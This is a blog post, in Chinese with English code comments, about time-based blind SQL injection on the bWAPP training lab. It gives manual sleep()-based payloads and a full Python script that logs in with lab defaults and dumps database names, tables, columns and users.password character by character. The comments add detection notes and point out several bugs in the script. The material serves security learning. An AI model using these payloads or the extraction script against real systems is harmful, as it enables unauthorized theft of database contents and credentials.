- 测试平台:bwapp
- SQL Injection - Blind - Time-Based
- 常用函数
- substr(a,b,c):从b位置开始,截取字符串a的c长度
- count():计算总数
- ascii():返回字符的ASCII
- length():返回字符串的长度
- left(a,b):从左往右截取字符串a的前b个字符
- sleep(n):将程序挂起n秒
- 用 and 连接,sleep 放在最后,才能确认前面的语句全为真
- 数据库名字长度获取
World War Z' and length(database())=4 and sleep(3) #
- 数据库的名字
World War Z' and ascii(substr(database(),1,1))==98 and sleep(3) #
- 写了个自动化脚本,没做优化
#coding:utf-8
import requests
import time
class SQL_TIME_BIND:
    """Time-based blind SQL injection probe for the bWAPP `sqli_15.php` lab page.

    Every method builds a `title=` query string that appends a condition plus
    `sleep(3)` (or `if(<cond>,sleep(3),1)`) to the page's search parameter,
    issues the GET through the logged-in session and times the round trip.
    A response slower than one second is read as "the condition held and the
    database executed sleep(3)"; anything faster is read as "false".  Results
    are only printed, never returned.

    Defender notes, limited to what the payloads below show:
    - The probes are ordinary GET requests whose query string carries
      `sleep(`, `information_schema`, `substr(`/`ascii(`, repeated dozens to
      hundreds of times per recovered value, so they stand out in access logs
      and WAF telemetry both by content and by volume.
    - The scenario exercised is the `title` value reaching a SQL statement
      unparameterized (inferred from the payload shape, not visible here);
      parameterized queries remove the timing side channel entirely.
    """
    def __init__(self,urlLogin,data,ip_port):
        """Log in once and keep the cookie-bearing session for every later probe.

        Args:
            urlLogin: login form URL, POSTed to immediately.
            data: form fields sent with the login POST.
            ip_port: `host:port` string interpolated into every probe URL.
        """
        self.ip_port = ip_port
        self.session=requests.session()
        # The login response is stored but never inspected: a failed login is
        # not detected here and would only surface as probes that never fire.
        self.resp=self.session.post(urlLogin,data)
    def get_db_name(self) -> None:
        """Recover the current database name one character at a time and print it.

        Step 1 finds the length by testing `length(database())=i` for i in 1..20.
        Step 2 tests `ascii(substr(database(),j,1))=k` for each position j and
        each candidate code k in 48..122 ('0'..'z'), keeping the first k whose
        request is slow.  A position with no match in that range is skipped
        silently, so the printed name can be shorter than `db_len`.
        """
        db_len = 0
        for i in range(1,21):
            url="http://%s/sqli_15.php?title=World War Z' and length(database())=%d and sleep(3) -- &action=search"%(self.ip_port,i)
            startTime=time.time()
            rsp=self.session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            # A wall-clock round trip above 1 s is treated as the injected
            # sleep(3) having run; plain network latency can trip this as well.
            if ga>1:
                print("length of database name is %d"%i)
                db_len=i
                break
        db_name = []
        for j in range(1,db_len+1):
            for k in range(48,123): # ASCII '0' .. 'z'
                url="http://%s/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and sleep(3) -- &action=search"%(self.ip_port,j,k)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    db_name.append(chr(k))
                    break
        print("".join(db_name))
    def get_table_name(self) -> None:
        """Enumerate the tables of the current schema and print each name.

        Three nested probes, all against `information_schema.tables` filtered
        by `table_schema=database()`:
        1. table count: first i for which `count(table_name) < i` is slow,
           so `count_table = i-1` equals the count itself;
        2. per table, name length via `length(... limit i,1) < l`;
        3. per table, each character via `ascii(substr(... limit i,1),m,1)) = n`.
        Every loop gives up after the fixed bound (19 tables / 19 characters).
        """
        # db_name = self.get_db_name()
        count_table = 0
        for i in range(1,20): # probe the number of tables
            # url="http://%s/sqli_15.php?title=World War Z' and if((select count(table_name) from information_schema.tables where table_schema=\'%s\')<%d,sleep(3),1) -- &action=search"%(self.ip_port,db_name,i)
            # print(url)
            url="http://%s/sqli_15.php?title=World War Z' and if((select count(table_name) from information_schema.tables where table_schema=database())<%d,sleep(3),1) -- &action=search"%(self.ip_port,i)
            startTime=time.time()
            rsp=self.session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                count_table = i-1
                break
        # return count_table
        # World War Z' and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))<4,sleep(3),1) --
        for i in range(count_table):
            len_table = 0
            for l in range(1,20):
                url="http://%s/sqli_15.php?title=World War Z' and if(length((select table_name from information_schema.tables where table_schema = database() limit %d,1))<%d,sleep(3),1) -- &action=search"%(self.ip_port,i,l)
                # print(url)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    len_table = l-1
                    break
            # print(len_table)
            # World War Z' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)) = 98,sleep(3),1) --
            table_name = []
            # NOTE(review): iterates over the probe variable `l` (len_table+1 when
            # the loop above broke), not `len_table`, so positions 0..len_table
            # are tested; position 0 is expected to never match.
            for m in range(l):
                for n in range(48,123): # ASCII '0' .. 'z'
                    url="http://%s/sqli_15.php?title=World War Z' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit %d,1),%d,1)) = %d,sleep(3),1) -- &action=search"%(self.ip_port,i,m,n)
                    # print(url)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        table_name.append(chr(n))
                        break
            print("".join(table_name))
    def get_columns_name(self,table_name: str) -> None:
        """Enumerate the columns of `table_name` and print each name.

        Same three-stage count / length / character scheme as `get_table_name`,
        against `information_schema.columns` filtered by `table_name`.  The
        table name is interpolated verbatim into the payload.

        Args:
            table_name: table whose column names are recovered.
        """
        count_col = 0
        for i in range(1,20): # probe the number of columns
            # World War Z' and if((select count(column_name) from information_schema.columns where table_name='users')<10,sleep(3),1) --
            url="http://%s/sqli_15.php?title=World War Z' and if((select count(column_name) from information_schema.columns where table_name=\'%s\')<%d,sleep(3),1) -- &action=search"%(self.ip_port,table_name,i)
            startTime=time.time()
            rsp=self.session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                count_col = i-1
                break
        # return count_table
        # World War Z' and if(length((select column_name from information_schema.columns where table_name = 'users' limit 0,1))<10,sleep(3),1) --
        for i in range(count_col):
            len_col = 0
            for l in range(1,20):
                url="http://%s/sqli_15.php?title=World War Z' and if(length((select column_name from information_schema.columns where table_name = \'%s\' limit %d,1))<%d,sleep(3),1) -- &action=search"%(self.ip_port,table_name,i,l)
                # print(url)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    len_col = l-1
                    break
            # World War Z' and if(ascii(substr((select column_name from information_schema.columns where table_name = \'%s\' limit %d,1),%d,1)) = %d,sleep(3),1) --
            col_name = []
            # Same `range(l)` rather than `range(len_col)` as in get_table_name.
            for m in range(l):
                for n in range(48,123): # ASCII '0' .. 'z'
                    url="http://%s/sqli_15.php?title=World War Z' and if(ascii(substr((select column_name from information_schema.columns where table_name = \'%s\' limit %d,1),%d,1)) = %d,sleep(3),1) -- &action=search"%(self.ip_port,table_name,i,m,n)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        col_name.append(chr(n))
                        break
            print("".join(col_name))
    def get_data(self,table_name: str,col_name: str) -> None:
        """Print every value of `col_name` in `table_name`, one row per line.

        Same count / length / character scheme as the schema methods, but the
        bounds are 265 rows and 265 characters, and the table and column names
        are interpolated verbatim into the payload.

        Args:
            table_name: table to read from.
            col_name: column whose values are recovered.
        """
        count_data = 0
        for i in range(1,266): # probe the number of rows
            # World War Z' and if((select count(*) from users)<10,sleep(3),1) --
            url="http://%s/sqli_15.php?title=World War Z' and if((select count(*) from %s)<%d,sleep(3),1) -- &action=search"%(self.ip_port,table_name,i)
            startTime=time.time()
            rsp=self.session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                # NOTE(review): assigns `count_col` (the name used in
                # get_columns_name) rather than the `count_data` initialised
                # above; if no probe ever fires, `range(count_col)` below
                # raises NameError instead of iterating zero times.
                count_col = i-1
                break
        # World War Z' and if(length((select id from users limit 0,1))<10,sleep(3),1) --
        for i in range(count_col):
            len_data = 0
            for l in range(1,266):
                url="http://%s/sqli_15.php?title=World War Z' and if(length((select %s from %s limit %d,1))<%d,sleep(3),1) -- &action=search"%(self.ip_port,col_name,table_name,i,l)
                # print(url)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    len_data = l-1
                    break
            # World War Z' and if(ascii(substr((select %s from %s limit %d,1),%d,1)) = %d,sleep(3),1) --
            t_data = []
            # Same `range(l)` rather than `range(len_data)` as in get_table_name.
            for m in range(l):
                for n in range(48,123): # ASCII '0' .. 'z'
                    url="http://%s/sqli_15.php?title=World War Z' and if(ascii(substr((select %s from %s limit %d,1),%d,1)) = %d,sleep(3),1) -- &action=search"%(self.ip_port,col_name,table_name,i,m,n)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        t_data.append(chr(n))
                        break
            print("".join(t_data))
def main() -> None:
    """Lab driver: log into the local bWAPP instance and dump `users.password`.

    The host and the `bee`/`bug` login are hard-coded lab values (they match
    bWAPP's shipped defaults); `security_level` "0" presumably selects the
    lowest protection level of the page.  The other extraction steps are left
    commented out and can be re-enabled one at a time.
    """
    ip_port="192.168.2.33:80"
    data={
        "login":"bee",
        "password":"bug",
        "security_level":"0",
        "form":"submit"
    }
    urlLogin="http://%s/login.php"%ip_port
    sql_time = SQL_TIME_BIND(urlLogin,data,ip_port)
    # sql_time.get_db_name()
    # sql_time.get_columns_name('users')
    # sql_time.get_data("users","login")
    sql_time.get_data("users","password")
if __name__ == "__main__":
    # Script entry point; nothing runs when the module is merely imported.
    main()
时间盲注
Author: felzl
Permalink: https://felzl.github.io/2021/10/14/%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/
License: Copyright (c) 2019 CC-BY-NC-4.0 LICENSE